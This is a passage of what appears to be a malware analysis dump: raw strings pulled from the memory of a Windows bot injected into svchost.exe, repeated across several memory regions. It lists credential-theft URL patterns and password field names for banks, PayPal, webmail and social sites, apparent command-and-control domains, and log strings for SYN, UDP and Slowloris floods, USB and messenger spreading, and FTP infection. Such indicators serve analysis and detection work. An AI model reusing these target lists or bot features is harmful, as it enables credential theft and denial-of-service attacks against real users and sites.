>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\System32\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1148_rwx_007F0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1192_rwx_00CF0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG 